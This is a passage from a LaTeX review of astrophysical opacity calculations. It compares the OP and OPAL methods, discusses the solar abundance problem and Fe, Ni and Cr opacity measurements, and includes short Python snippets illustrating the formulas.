\frac{1}{\kappa_R}=\left[\int_0^\infty \frac{1}{\kappa_\nu}\,\frac{\partial B_\nu}{\partial T}{\rm d}\nu\right]
\left[\frac{{\rm d}B}{{\rm d}T}\right]^{-1}\ .
\end{equation}
Radiative transfer is then essentially controlled by the {\it {Rosseland mean opacity}}
\begin{equation}
\frac{1}{\kappa_R}=\int_0^\infty \frac{1}{\kappa_u}\times g(u){\rm d}u\
\end{equation}
where the reduced photon energy is $u=h\nu/kT$ and the weighting function $g(u)$ is given by
\begin{equation}
g(u)=\frac{15}{4\pi^4}u^4\exp(-u)[1-\exp(-u)]^{-2}\ .
\end{equation}
The monochromatic opacity
\begin{equation}
\kappa_\nu= \kappa_\nu^{\rm bb}+\kappa_\nu^{\rm bf}+\kappa_\nu^{\rm ff}+\kappa_\nu^{\rm sc}
\end{equation}
includes contributions from all the bound--bound (bb), bound--free (bf), free--free (ff), and photon scattering (sc) processes in the plasma. This implies massive computations of atomic data, namely energy levels (ground and excited), $f$-values, and photoionization cross sections for all the constituent ionic species of the plasma and for a wide range of temperatures and densities; it also requires an adequate equation of state to determine the ionization fractions and level populations, as well as the broadening mechanisms responsible for the line profiles.
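As a quick numerical illustration (a throwaway sketch, not production code), $g(u)$ integrates to unity and peaks near $u\simeq3.83$; at $T=20$~eV this puts the peak at photon energies of roughly $77$~eV, the region of the Fe $n=3\rightarrow3$ transition array discussed in Section~\ref{revop}.

```python
import math

def g_weight(u):
    """Rosseland weighting function g(u) of Eq. (5)."""
    return (15.0 / (4.0 * math.pi ** 4)) * u ** 4 * math.exp(-u) \
        / (1.0 - math.exp(-u)) ** 2

# trapezoidal quadrature on [1e-4, 60]; both tails are negligible
us = [1e-4 + 1e-3 * i for i in range(60000)]
gs = [g_weight(u) for u in us]
norm = sum(0.5 * (gs[i] + gs[i + 1]) * 1e-3 for i in range(len(us) - 1))
u_peak = us[max(range(len(us)), key=gs.__getitem__)]
```

Here `norm` comes out as 1 to within the quadrature error, reflecting the analytic identity $\int_0^\infty u^4e^u(e^u-1)^{-2}\,{\rm d}u=4\pi^4/15$, and `u_peak` lands near $3.83$.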
\begin{figure}[h!]
\includegraphics[width=0.75\textwidth]{fig1.eps}
\caption{\label{atom} Multichannel ionic structure showing series of singly and doubly excited bound states and resonances and several continua.}
\end{figure}
\subsection{\label{methods} Numerical Methods}
In the computations of the vast atomic data required for opacity estimates---namely level energies, $f$-values, and photoionization cross sections---OP and OPAL used markedly different quantum-mechanical methods. The former adopted a multichannel framework based on the close-coupling expansion of scattering theory \cite{ber87}, where the $\Psi(SL\pi)$ wave function of an ($N+1$)-electron system is expanded in terms of the $N$-electron $\chi_i$ core eigenfunctions
\begin{equation}
\label{cc}
\Psi(SL\pi) = \sum_i \chi_i\theta_i + \sum_j c_j\Phi_j(SL\pi)\ .
\end{equation}
The second term in Equation~(\ref{cc}) is a configuration-interaction (CI) expansion built up from core orbitals to account for orthogonality conditions and to improve short-term correlations. Core~orbitals were generated with standard CI atomic structure codes such as SUPERSTRUCTURE \cite{eis74} and CIV3~\cite{hib75}, and the total system wave functions and radiative data were computed with the $R$-matrix method \cite{bur71, ber95} including extensive developments in the asymptotic region specially tailored for the project \cite{sea86}. The latter allowed the treatment of both the discrete and continuum spectra for an ionic species in a unified manner (see Figure~\ref{atom}), its effectiveness depending on the accuracy and completeness of the core eigenfunction expansion in Equation~(\ref{cc}), particularly at the several level crossings that take place along an isoelectronic sequence as the atomic number $Z$ increases.
The OPAL code, on the other hand, relied on parametric potentials that generated radiative data of accuracy comparable to single-configuration, self-consistent-field, relativistic schemes \cite{rog88, igl92}. The~parent (i.e., core) configuration defines a Yukawa-type potential
\begin{equation}
\label{param}
V=-\frac{2}{r}\left((Z-v)+\sum_{n=1}^{n_{\rm max}}N_n\exp(-\alpha_n r)\right)
\end{equation}
with $v=\sum_{n=1}^{n_{\rm max}}N_n$ for all the subshells and scattering states available to the active electron. In~Equation~(\ref{param}), $N_n$ is the number of electrons in the shell with principal quantum number $n$, $n_{\rm max}$~being the maximum value in the parent configuration, and $\alpha_n$ are $n$-shell screening parameters determined from matches of solutions of the Dirac equation with spectroscopic one-electron, configuration-averaged ionization energies. Thus, in this approach the atomic data were computed on the fly as required rather than relying on stored files (as in OP) that might prove inadequate in certain plasma conditions.
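A sketch of Equation (\ref{param}) makes the two Coulomb limits of the parametric potential explicit: $rV(r)\to-2Z$ as $r\to0$ (unscreened nucleus) and $rV(r)\to-2(Z-v)$ as $r\to\infty$ (fully screened ionic charge). The shell occupations and screening parameters below are made-up placeholders, not fitted OPAL values.

```python
import math

def parametric_potential(r, Z, shells):
    """Eq. (8): V(r) = -(2/r) [ (Z - v) + sum_n N_n exp(-alpha_n r) ],
    with v = sum_n N_n; shells is a list of (N_n, alpha_n) pairs."""
    v = sum(N for N, _ in shells)
    screened = sum(N * math.exp(-a * r) for N, a in shells)
    return -(2.0 / r) * ((Z - v) + screened)

# e.g. an Fe ion with 10 core electrons (N_1, N_2 = 2, 8; alphas invented)
Z, shells = 26, [(2, 21.0), (8, 7.5)]
assert abs(1e-9 * parametric_potential(1e-9, Z, shells) + 2 * Z) < 1e-5
assert abs(50.0 * parametric_potential(50.0, Z, shells) + 2 * (Z - 10)) < 1e-6
```

The active electron thus sees the full nuclear charge at short range and the asymptotic ionic charge $Z-v$ at long range, with the $\alpha_n$ interpolating between the two regimes.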
\subsection{Equation of State}
The formalisms of the equation of state implemented by OP and OPAL were also significantly different. In the OP the chemical picture was emphasized \cite{hum88, mih92}, where clusters (i.e., atoms or ions) of fundamental particles can be identified and the partition function of the canonical ensemble is factorizable. Thermodynamic equilibrium occurs when the Helmholtz free energy reaches a minimum for variations of the ion densities, and the internal partition function for an ionic species $s$ can then be~written as
\begin{equation}
Z_s = \sum_i w_{is}\,g_{is}\exp(-E_{is}/kT)
\end{equation}
where $g_{is}$ and $w_{is}$ are, respectively, the statistical weight and occupation probability of the $i$th level. The~main problem was then the estimation of the latter, which was performed either by assuming a nearest-neighbor approximation for the ion microfield or by means of distribution functions that included plasma correlation effects.
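A minimal numerical sketch of why the occupation probabilities $w_{is}$ matter: without them the Rydberg sum over hydrogenic statistical weights $g_n=2n^2$ grows without bound, while any physically motivated damping of the high-$n$ states yields a converged partition function. The functional form of $w$ used below is purely illustrative; it is not the actual occupation-probability prescription of \cite{hum88}.

```python
import math

def internal_partition_function(levels, kT):
    """Truncated internal partition function in the chemical picture:
    Z_s = sum_i w_i g_i exp(-E_i/kT). Each level is a tuple
    (w_i, g_i, E_i); the occupation probability w_i damps the
    otherwise divergent sum over the Rydberg series."""
    return sum(w * g * math.exp(-E / kT) for (w, g, E) in levels)

# Illustrative hydrogenic levels (energies in Rydberg below threshold).
# With all w_i = 1 the sum keeps growing with the n cutoff; with a
# made-up perturbation damping of the high-n states it converges.
kT = 1.0
levels_w1 = [(1.0, 2 * n**2, 1.0 - 1.0 / n**2) for n in range(1, 200)]
levels_w = [(math.exp(-0.01 * n**4), 2 * n**2, 1.0 - 1.0 / n**2)
            for n in range(1, 200)]
Z_raw = internal_partition_function(levels_w1, kT)    # grows with the cutoff
Z_damped = internal_partition_function(levels_w, kT)  # converged
```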
The OPAL equation of state was based on many-body activity expansions of the grand canonical partition function that avoided Helmholtz free-energy compartmentalization \cite{rog92}. Since pure Coulomb interactions between the electrons and nuclei are assumed, the divergence of the partition function does not take place; thus, there is no need to consider explicitly the plasma screening effects on the bound states.
\subsection{Revised Opacities}
\label{revop}
When compared to the LAAOL (see Figure~\ref{opal}), preliminary OPAL iron monochromatic opacities at density $\rho= 6.82\times 10^{-5}$~g\,cm$^{-3}$ and temperature $T=20$~eV indicated large enhancements at photon energies around 60~eV \cite{igl87}. These enhancements are due to an $n=3\rightarrow 3$ unresolved transition array that significantly boosts the Rosseland mean since its weighting function peaks at around 80~eV. Within the OP $R$-matrix approach, such transitions were computationally intractable at the time, and were instead treated for the systems Fe~{\sc viii} to Fe~{\sc xiii} in a simpler CI approach (i.e., second term of Equation~(\ref{cc})) with the SUPERSTRUCTURE atomic structure code \cite{lyn95}. The dominance of this $\Delta n=0$ unresolved transition array in Fe was subsequently verified by laboratory photoabsorption measurements \cite{das92}.
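The weighting function of the Rosseland mean is $\partial B_\nu/\partial T$, which in the reduced variable $u=h\nu/kT$ varies as $u^4e^u/(e^u-1)^2$ and peaks at $u\approx 3.83$. A short Python check confirms that for $kT=20$~eV the maximum weight indeed falls near the quoted 80~eV:

```python
import math

def rosseland_weight(u):
    """Shape of the Rosseland weighting function dB_nu/dT in the
    reduced variable u = h*nu/kT: W(u) ~ u^4 exp(u) / (exp(u) - 1)^2
    (overall normalization irrelevant for locating the peak)."""
    return u**4 * math.exp(u) / (math.exp(u) - 1.0)**2

# Locate the peak numerically on a fine grid.
us = [0.01 * i for i in range(1, 3000)]
u_peak = max(us, key=rosseland_weight)  # ~ 3.83

kT = 20.0               # plasma temperature in eV, as in the Fe comparison
E_peak = u_peak * kT    # photon energy (eV) of maximum weight, ~ 77 eV
```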
\begin{figure}[h!]
\includegraphics[width=0.9\textwidth]{fig2.eps}
\caption{\label{opal} Monochromatic Fe opacities at $\rho= 6.82\times 10^{-5}$~g\,cm$^{-3}$ and $T=20$~eV. \textit{Left panel}: LAAOL. \textit{Right panel}: OPAL. Reproduced from Figures~1 and 2 of \cite{igl87} with permission of the $^\copyright$AAS and the Lawrence Livermore National Laboratory.}
\end{figure}
It was later pointed out that, in spite of generally satisfactory agreement, the larger differences between the OPAL and OP opacities were at high temperatures and densities due to missing inner-shell contributions in OP \cite{igl95}. Hence, the latter were systematically included in a similar CI approach with the AUTOSTRUCTURE code in what became a major update of the OP data sets \cite{bad03, sea04, bad05}, illustrated in Figure~\ref{s92}~(left) for the solar S92 mix. After this effort and as shown in Figure~\ref{s92}~(right), the OPAL and OP opacities were thought to be in good working order, and it was actually mentioned that they could not be differentiated in stellar pulsation calculations \cite{kan94}.
\begin{figure}[h]
\includegraphics[width=0.45\textwidth]{fig3a.eps}
\includegraphics[width=0.45\textwidth]{fig3b.eps}
\caption{\label{s92} {\it Left}: Inner-shell contributions to the Rosseland-mean opacities for the S92 mix. {\it Right}: The OP and OPAL Rosseland-mean opacities for the S92 mix. Note: $R=\rho/T^3_6$ where $\rho$ is the mass density in g\,cm$^{-3}$ and $T_6=10^{-6}\times T$ with $T$ in K. Reproduced from Figures~1 and 2 of Ref.~\cite{bad05}.}
\end{figure}
\subsection{Big-Data Science}
\label{bigdata}
The OP was a pioneering example of what is now called collaborative big-data science \cite{hey09}. It~involved the computation of large data sets by several internationally distributed research groups, which were then compiled and stringently curated before becoming part of what eventually became TOPbase \cite{cun92, cun93}, one of the first online atomic databases. In order to ensure machine independence, its~database management system was completely developed from scratch in standard Fortran-77, and~its user interface rapidly evolved from command-based to web-browser-based. Furthermore, TOPbase was housed right from the outset in a {\em {data center}}, namely the Centre de Donn\'ees astronomiques de Strasbourg (CDS) \footnote{http://cdsweb.u-strasbg.fr/}, also a seminal initiative at the time.
Regarding the dissemination of monochromatic and mean opacities for arbitrary chemical mixes, the OP also implemented the innovative concept of a {\em {web service}}, namely the OPserver \cite{men07}, accessible~online from the Ohio Supercomputer Center \footnote{https://www.osc.edu/}. Since the main overhead in the calculation of mean opacities or radiative accelerations is the time taken to read large data volumes from secondary storage (disk), the OPserver always keeps the bulk of the monochromatic opacities in main memory (RAM) waiting for a service call from a web portal or the modeling code of a remote user; furthermore, the OPserver can also be downloaded (data and software) to be installed locally on a workstation. Its current implementation and performance are tuned to streamline stellar structure or evolution modeling requiring mean opacities for varying chemical mixtures at every radial point or time interval.
\section{\label{SAP} Solar Abundance Problem}
\subsection{Standard Solar Model}
In 2005 there was much expectation in the solar modeling community for the OP inner-shell opacity update (see Section~\ref{revop}), as the very precise and much coveted benchmarks of the SSM with the helioseismic indicators---namely the radius of the convection zone boundary (CZB), the He surface abundance, and the sound-speed profile---had been seriously disrupted by a downward revision of the photospheric metal abundances \cite{asp05}. This was the result of advanced 3D hydrodynamic simulations that took into account granulation and non-LTE effects \cite{bah05a,bah05b}. In this regard, the final improved agreement between the OP and OPAL mean opacities after the aforementioned update turned out to be a disappointment to the SSM community.
\begin{table}[h]
\caption{\label{abund} Standard solar model (SSM) benchmarks (BS05 model from \cite{bah05b}) with the helioseismic predictions \cite{bas04}, namely the depth of the CZB ($R_\mathrm{cz}/R_\mathrm{sun}$) and He surface mass fraction ($Y_\mathrm{sur}$), using OP and OPAL opacities and the standard (GS98) \cite{gre98} and revised (AGS05) \cite{asp05} metal abundances.}
\begin{ruledtabular}
\begin{tabular}{ccc}
Model & $R_\mathrm{cz}/R_\mathrm{sun}$ & $Y_\mathrm{sur}$ \\
\colrule
BS05(GS98,OPAL) & 0.715 & 0.244 \\
BS05(GS98,OP) & 0.714 & 0.243 \\
BS05(AGS05,OPAL) & 0.729 & 0.230 \\
BS05(AGS05,OP) & 0.728 & 0.229 \\
Helioseismology & 0.713(1) & 0.249(3) \\
\end{tabular}
\end{ruledtabular}
\end{table}
This situation can be appreciated in Table~\ref{abund}, where the SSM benchmarks with the helioseismic measurements of the CZB and He surface mass fraction are hardly modified by the opacity choice (OPAL or OP), while the new abundances \cite{asp05} lead to noticeable modifications. It is further characterized by the SSM discrepancies with the helioseismic sound-speed profile near the CZB (see Figure~\ref{soundvel}), which have been shown to disappear with an opacity increase of $\sim 30\%$ in this region that tapers down to a few percent in the solar core \cite{chr09}.
\begin{figure}[h!]
\includegraphics[width=0.7\textwidth]{fig4.eps}
\caption{\label{soundvel} Relative sound-speed differences between helioseismic measurements and SSM using the standard solar composition \cite{gre98} (open circles) and the revised metal abundances \cite{asp05} (filled circles). Reproduced from Figure~1 of \cite{chr09} with permission of $^\copyright$ESO.}
\end{figure}
\subsection{Seismic Solar Model}
The sound-speed profile in the solar core has also been useful, in what is referred to as the seismic solar model (SeSM) \cite{tur16b}, to verify the reliability of the highly temperature-dependent (and~thus opacity-dependent) nuclear reaction rates in reproducing the observed solar neutrino fluxes. In other words, both the helioseismic indicators and neutrino fluxes impose fairly strict constraints on the opacities and metal abundances (of both volatile and refractory elements) at different solar radii. For~instance, in spite of improved accord with the helioseismic CZB depth and sound speed, the higher metallicity recently derived from {\it in situ} measurements of the solar wind \cite{ste16} (see Table~\ref{abund2}) has been seriously questioned \cite{ser16a, vag17a, vag17b} because of a neutrino overproduction caused by the refractory excess (i.e., from Mg, Si, S, and Fe). In Table~\ref{abund2}, a more recent revision of the photospheric metallicity~\cite{asp09} is also tabulated that is $\sim$10\% higher but still $\sim$25\% lower than the previously assumed standard \cite{gre98}, and which has been independently confirmed by a similar 3D hydrodynamic approach \cite{caf11}. It has been shown \cite{ser09} that, with the more recent abundances of \cite{asp09}, the required opacity increase in the SSM to restore the helioseismic benchmarks is now only around $15\%$ at the CZB and $5\%$ in the core, i.e., half of what was previously estimated \cite{chr09}.
\begin{table}[h]
\caption{\label{abund2} Solar abundances ($\log\epsilon_i\equiv\log N_i/N_{\rm H}+12$). GS98: \cite{gre98}. AGS05: \cite{asp05}. AGSS09: \cite{asp09}. CLSFB11: \cite{caf11}. SZ16: \cite{ste16}.}
\begin{ruledtabular}
\begin{tabular}{cccccc}
$i$ & GS98 & AGS05 & AGSS09 & CLSFB11 & SZ16\\
\colrule
C & 8.52 & $8.39(5)$ & $8.43(5)$ & $8.50(6)$ & $8.65(8)$ \\
N & 7.92 & $7.78(6)$ & $7.83(5)$ & $7.86(12)$ & $7.97(8)$ \\
O & 8.83 & $8.66(5)$ & $8.69(5)$ & $8.76(7)$ & $8.82(11)$ \\
Ne & 8.08 & $7.84(6)$ & $7.93(10)$ & & $7.79(8)$ \\
Mg & 7.58 & $7.53(9)$ & $7.60(4)$ & & $7.85(8)$ \\
Si & 7.56 & $7.51(4)$ & $7.51(3)$ & & $7.82(8)$ \\
S & 7.20 & $7.14(5)$ & $7.12(3)$ & $7.16(5)$ & $7.56(8)$ \\
Fe & 7.50 & $7.45(5)$ & $7.50(4)$ & $7.52(6)$ & $7.73(8)$ \\
\colrule
$Z/X$ & 0.0229 & 0.0165 & 0.0181 & 0.0209 & 0.0265 \\
\end{tabular}
\end{ruledtabular}
\end{table}
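To make the table footnote concrete, the GS98 column can be converted to an approximate metal-to-hydrogen mass-fraction ratio. The sketch below uses standard atomic weights and sums only the eight tabulated metals, so it slightly undershoots the full GS98 value $Z/X=0.0229$ (the remainder comes from metals not listed in the table).

```python
# Convert abundances log(eps_i) = log10(N_i/N_H) + 12 (GS98 column of
# Table 2) into an approximate metal-to-hydrogen mass ratio
# Z/X ~ sum_i A_i N_i / (A_H N_H).
log_eps = {'C': 8.52, 'N': 7.92, 'O': 8.83, 'Ne': 8.08,
           'Mg': 7.58, 'Si': 7.56, 'S': 7.20, 'Fe': 7.50}
atomic_weight = {'C': 12.011, 'N': 14.007, 'O': 15.999, 'Ne': 20.180,
                 'Mg': 24.305, 'Si': 28.086, 'S': 32.06, 'Fe': 55.845}

A_H = 1.008
Z_over_X = sum(atomic_weight[e] * 10.0**(log_eps[e] - 12.0)
               for e in log_eps) / A_H
# Z_over_X ~ 0.022, close to the tabulated GS98 Z/X = 0.0229
```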
\subsection{Multidisciplinary Approach}
Consensus has been reached in a multidisciplinary community encompassing sophisticated research fields (see Figure~\ref{sap}), for which the reliability of computed and measured opacities is a key concern, that there is at present a solar abundance problem. This critical situation is encouraging further developments and discussions that, in a similar manner to the solar neutrino problem, are expected to converge soon to a comprehensive solution. For instance, since the SSM is basically a static representation, there has been renewed interest in considering magnetic and dynamical effects such as rotation, elemental diffusion, mixing, and convection overshoot \cite{ser16b, tur16b}. Nuclear fusion cross sections have also been critically evaluated, pinpointing cases for which the current precision could be improved \cite{ade11}.
\begin{figure}[t!]
\includegraphics[width=0.70\textwidth]{fig5.eps}
\caption{\label{sap} Research fields of the multidisciplinary community involved in the solar abundance problem.}
\end{figure}
Helioseismology has become a powerful diagnostic technique; for instance, it remarkably enables the performance evaluation of the different equations of state \cite{vor13}, and with the advent of the {\em Kepler}
\footnote{http://kepler.nasa.gov/} and {\em CoRoT} \footnote{http://bit.ly/2cYJ09w} space probes, it has been successfully applied to other stellar structures and evolutionary models in what is rapidly becoming a well-established research endeavor: asteroseismology \cite{cha13}. In this regard, it has curiously been shown that, in the complex asteroseismology of some hybrid B-type pulsators (e.g., $\gamma$~Pegasi), both the OPAL and OP opacity tables perform satisfactorily \cite{wal10}, but in others ($\nu$~Eridani) inconsistencies appear in the analysis that still seem to indicate missing opacity \cite{das10}, a point that is treated to some extent in Sections~\ref{op}--\ref{lre}.
\section{\label{op} Atomic Opacities, Recent Developments}
In a similar way to other research areas of Figure~\ref{sap}, the solar abundance problem has stimulated detailed revisions and new developments of the astrophysical opacity tables and the difficult laboratory reproduction of the plasma conditions at the base of the solar convection zone to obtain comparable~measurements.
The OPAC international consortium \cite{gil12, gil13} has been carrying out extensive comparisons using a battery of opacity codes (SCO, CASSANDRA, STA, OPAS, LEDCOP, OP, and SCO-RCG), looking into the importance of configuration-interaction accounting, mainly for elements of the iron-group bump ($Z$~bump), i.e., Cr, Fe, and Ni, due to their relevance in the pulsation of intermediate-mass stars. In this respect, the magnitude of the Fe and Ni contributions to the $Z$~bump and the temperature at which they occur have been shown to be critical in p- and g-mode pulsations in cool subdwarf B stars \cite{jef06a, jef06b}. Problems with both the OPAL and OP tables have been reported; for instance, there are considerable differences in the OPAS and OP single-element monochromatic opacities even though the OPAS RMO $\kappa_{\rm R}$ for the solar mixture by \cite{gre98} agree to within 5\% with both OPAL and OP for the entire radiative zone of the Sun ($0.0\leq r/R_\odot\leq 0.713$) \cite{bla12}. The largest $\kappa_{\rm R}^{\rm OPAS}/\kappa_{\rm R}^{\rm OP}$ deviations are found in Mg ($-44\%$), Fe~($+40\%$), and Ni ($+47\%$) due to variations in the ionic fractions (particularly for the lower charge states), missing configurations in OP, and the pressure broadening of the K$\alpha$ line in the He-like systems.
A new generation of Los Alamos opacity tables (OPLIB) including elements with atomic number $Z\leq 30$ have been computed with the ATOMIC code and made publicly available \cite{col16}. They have been used to study the $Z$~bump, finding reasonable agreement with transmission measurements in the XUV but sizeable, factor-level differences with the OP RMO tables for Fe and Ni \cite{tur16a}. Additionally, relativistic opacities for Fe and Ni computed with the Los Alamos codes are found to be in good agreement with semi-relativistic versions, bolstering confidence in their numerical methods \cite{fon15}.
Solar models have been recently computed with both the OPLIB and OPAL opacity tables and the metal abundances of \cite{asp09}, finding only small differences in the helioseismic indicators although the OPLIB data display steeper opacity derivatives at the temperatures and densities associated with the solar interior \cite{guz16}. These opacity derivatives directly impact stellar pulsation properties such as the driving frequency, and since the latter data set has also been shown to yield a higher RMO than OPAL and OP in the $Z$-bump region, it
gives rise to wider B-type-pulsator instability domains \cite{wal15}. However, basic pulsating-star problems remain unsolved, such as the pulsations of the B-type stars in the Large and Small Magellanic Clouds. Moreover, in a recent analysis of the oscillation spectrum of $\nu$~Eridani with different opacity tables, OPLIB is to be preferred over OPAL and OP, but the observed frequency ranges can only be modeled with substantially modified mean-opacity profiles (an increase of a factor of 3 or larger at $\log(T)=5.47$ to ensure g-mode instability and a reduction of 65\% at $\log(T) = 5.06$ to match the empirical $f$ non-adiabatic parameters) that are nevertheless impaired by puzzling side effects: enhanced convection efficiency in the $Z$ bump affecting mode instability and avoided-crossing effects in radial modes \cite{das17}.
The OPAL opacity code has been updated (now referred to as TOPAZ) to improve atomic data accuracy and used to recompute the monochromatic opacities of the iron-group elements \cite{igl15a}; small~decreases (less than 6\%) with respect to the OPAL96 tables have been found. The OP collaboration (IPOPv2), on the other hand, has been performing test calculations on the Ni opacity by treating Ni~{\sc xiv} as a study case \cite{del13}, and a new online service for generating opacity tables is available \cite{del16}.
To bypass the computational shortcomings of the detailed-line-accounting methods in managing the huge number of spectral lines of the more complex ions, novel methods based on variations and extensions of the {\it {unresolved-transition-array}} (UTA) concept \cite{bau88} have been implemented. In these methods, the transition array between two configurations is usually reduced to a single Gaussian but can be replaced by a sum of partially resolved transition arrays represented by Gaussians \cite{igl12a, igl12c} that are then sampled statistically to simulate detailed line accounting \cite{igl12b}. For heavy ions where UTAs still fall short, a higher-level extension referred to as the {\it {super-transition-array}} (STA) method involves the grouping of many configurations into a single superconfiguration, whereby the UTA summation to a single STA can be performed analytically \cite{haz12, wil15, kur16}. Recent STA calculations of the RMO in the solar convection zone boundary agree very well with both OP and OPAL, and predict a meager heavy-element ($Z>28$) contribution \cite{kri16a}.
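The basic UTA reduction can be sketched in a few lines: a transition array is collapsed to a Gaussian whose total strength, centroid, and width are the strength-weighted moments of the individual lines. The five-line mini-array below is made up for illustration; it is not real Fe data.

```python
import math

def uta_gaussian(lines):
    """Collapse a transition array into its unresolved-transition-array
    (UTA) Gaussian: total strength plus the strength-weighted mean
    energy and standard deviation of the individual lines. `lines` is
    a list of (energy, strength) pairs."""
    S = sum(s for (_, s) in lines)
    mean = sum(E * s for (E, s) in lines) / S
    var = sum(s * (E - mean)**2 for (E, s) in lines) / S
    return S, mean, math.sqrt(var)

def uta_profile(E, S, mean, sigma):
    """Gaussian absorption profile carrying the total array strength."""
    return S * math.exp(-0.5 * ((E - mean) / sigma)**2) / (
        sigma * math.sqrt(2.0 * math.pi))

# Hypothetical mini-array of five lines around 60 eV.
lines = [(58.0, 0.2), (59.5, 0.5), (60.0, 1.0), (60.8, 0.6), (62.0, 0.1)]
S, mean, sigma = uta_gaussian(lines)
```

The single Gaussian preserves the array's integrated strength while discarding the line-by-line detail, which is exactly the trade-off the statistically sampled partially resolved variants try to recover.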
The most salient effort has perhaps been the recent measurements of Fe monochromatic opacities in laboratory plasma conditions similar to the solar CZB ($T_e=1.9{-}2.3$~MK and $N_e=0.7{-}4.0\times 10^{22}$~cm$^{-3}$) that show increments (30--400\%) that it has not yet been possible to match theoretically \cite{bai15}. However, the mean-opacity enhancements are still not large enough (only 50\%) to restore the SSM helioseismic benchmarks, but sizeable experimental increases in other elements of the solar mixture such as Cr and Ni would certainly reduce the current discrepancy. Furthermore, a point of concern in this experiment is the model dependency of the electron temperature and density determined by K-shell spectroscopy of the tracer Mg; however, as discussed in \cite{nag16}, it is not expected to be large enough to explain the standing disaccord with theory.
The line broadening approximations implemented in most opacity calculations have been recently questioned \cite{kri16b}, with reports of large discrepancies between the OP K-line widths and those in other opacity codes. It is also shown therein that the solar opacity profile is sensitive to the pressure broadening of K~lines, which can be empirically matched with the helioseismic indicators by a K-line width increase of around a factor of 100. This moderate line-broadening dependency (a few percent) of the solar opacity near the bottom of the convection zone concurs with previous findings \cite{igl91, sea04}.
\subsection{Fe Opacity}
\label{fe_op}
The iron opacity is without a doubt the most revered in atomic astrophysics due, on the one hand, to its relevance in the structure of the solar interior and in the driving of stellar pulsations, and on the other, to the difficulties in obtaining accurate and complete radiative data sets for the Fe ions. In this respect, the versatile HULLAC relativistic code \cite{bar01} has been used to study CI effects mainly in $3\rightarrow 3$ and $3\rightarrow 4$ transitions that dominate the maximum of the RMO \cite{tur13b}. At $T=27.3$~eV and $\rho=3.4$~mg\,cm$^{-3}$, it is found that CI causes noticeable changes in the spectrum shape due to line shifts at the lower photon energies; good agreement is found with OP in contrast to the spectra by other codes such as SCO-RCG, LEDCOP, and OPAS. The importance of CI is also brought out in comparisons of the OP and OPAL monochromatic opacities with old transmission measurements, namely spectral energy displacements \cite{tur13b}.
However, a further comparison \cite{tur16a} with recent results at $T=15.3$~eV and $\rho=5.48$~mg\,cm$^{-3}$ obtained with the ATOMIC modeling code, results that include contributions from transitions with $n\le 5$, shows significantly higher monochromatic opacities than OP for photon energies greater than 100~eV and almost a factor of 2 increase in the RMO; it is pointed out therein that this is due to limited M-shell configuration expansions in OP for ions such as Fe~{\sc viii}.
A more controversial situation involves the recently measured Fe monochromatic opacities that proved to be higher than expected in conditions similar to those of the solar CZB \cite{bai15}. Such a result came indeed as a surprise since previous comparisons of transmission measurements at $T=156\pm 6$~eV and $N_e=(6.9\pm 1.7)\times 10^{21}$~cm$^{-3}$ with opacity models---namely ATOMIC, MUTA, OPAL, PRISMSPECT,~and TOPAZ---showed satisfactory line-by-line agreement \cite{bai07, igl15b, col16}. Relative to \cite{bai15}, the~OP values are not only lower, but the wavelengths of the strong spectral features are not reproduced accurately. Other codes, namely ATOMIC, OPAS, SCO-RCG, and TOPAZ, perform somewhat better regarding the positions of the spectral features, but the absolute backgrounds are also generally too low; moreover, the computed RMO are in general smaller than experiment by factors greater than 1.5. It has been suggested that calculations have missing bound--bound transitions or underestimate certain photoionization cross sections \cite{bai15}. The measured windows are higher than those predicted by models, the peak values show a large (50\%) scatter, and the measured widths of prominent lines are significantly broader. On the other hand, from the point of view of oscillator-strength distributions and sum rules, the measured data appear to display unexplainable anomalies \cite{igl15b}.
A recent $R$-matrix calculation \cite{nah16a} involving the topical Fe~{\sc xvii} ionic system has found large (orders of magnitude) enhancements in the background photoionization cross sections and huge asymmetric resonances produced by core photoexcitation that lead to higher (35\%) RMO; however,~such~claims have been seriously questioned \footnote{A.~K. Pradhan, private communication (2017).} \cite{bla16, nah16b, igl17}.
\subsection{Ni and Cr Opacities}
Due to their contributions to the $Z$ bump, the Ni and Cr opacities have also received considerable attention. For the former, it has been shown \cite{tur13b} that CI effects on the RMO are not as conspicuous as those of Fe: they manifest themselves mainly at lower photon energies (50--60~eV), but the spectral features are distinctively different from those of the OP; the latter are believed to be faulty as they were determined by extrapolation procedures. A similar diagnostic has been put forward for Cr, and both are supported by recent transmission measurements in the XUV \cite{tur16a}; moreover, comparisons with data from the ATOMIC code apparently lead to discrepancies with the OP Ni RMO of a factor of 6.
\section{Line, Resonance, and Edge Profiles}
\label{lre}
As mentioned in Section~\ref{op}, a study of line profiles in opacity calculations has shown that OP K-line widths are largely discrepant with those in other plasma models in conditions akin to the solar CZB \cite{kri16b}. Such a finding in fact reflects essential differences in the treatment of ionic models in opacity calculations; i.e., between the OP multichannel representations (see Figure~\ref{atom}) and the simpler uncoupled, or in some cases statistical, versions adopted by other projects that become particularly conspicuous in spectator-electron processes. The latter are responsible for K-line widths, the broad profiles of resonances resulting from core photoexcitation (PECs hereafter) and ionization-edge structures. The K-line pressure broadening issue is also examined.
\subsection{\label{res} Spectator-Electron Processes}
It has been shown that the electron impact broadening of such features is intricate, requiring the contributions from interference terms that cause overlapping lines to coalesce in such a way that spectator-electron relaxation does not affect the line shape, i.e., it leads to narrower lines with restricted wings~\cite{igl10}. Electron impact broadening of resonances in the close-coupling formalism is also currently under review \footnote{A.~K. Pradhan, private communication (2016).}. Furthermore, as discussed by \cite{pai15}, spectator-electron transitions can give rise to a large number of X-ray satellite lines that can significantly broaden the red wing of a resonance line; since they are difficult to treat in the usual detailed-line-accounting approach, the approximate statistical methods based on UTAs \cite{igl12a, igl12b, igl12c} mentioned previously (see Section~\ref{op}) have been proposed.
In Sections~\ref{pec}--\ref{ie} we briefly discuss how such processes are currently handled within the $R$-matrix framework, in particular with regard to the problem of complete configuration accounting.
\subsubsection{PEC Resonances}
\label{pec}
PECs were first discussed in the OP by \cite{yan87}, and to illustrate their line shapes and widths, we~consider the photoabsorption of the $3sns\ ^1S$ states of Mg-like Al~{\sc ii} described in \cite{but93}:
\begin{equation}
3sns\,^1S+\gamma\rightarrow 3pn's\,^1P^o\rightarrow 3s\,^2S+ e^-\ .
\end{equation}
